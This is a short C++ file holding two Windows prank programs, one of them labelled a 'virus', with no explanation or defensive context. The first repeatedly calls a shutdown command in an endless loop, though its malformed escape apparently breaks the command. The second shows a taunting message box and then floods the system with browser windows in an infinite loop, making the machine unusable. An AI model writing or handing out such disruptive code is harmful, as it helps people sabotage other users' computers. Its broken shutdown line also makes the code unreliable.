//1
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main(){
while(1){
system("shutdown \s");
}
return 0;
}
//2
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main(){
int cnt=0;
while(1){
MessageBox(NULL,"你点出去啊","病毒",MB_OKCANCEL);
while(1){
system("start http://www.baidu.com");
}
}
return 0;
}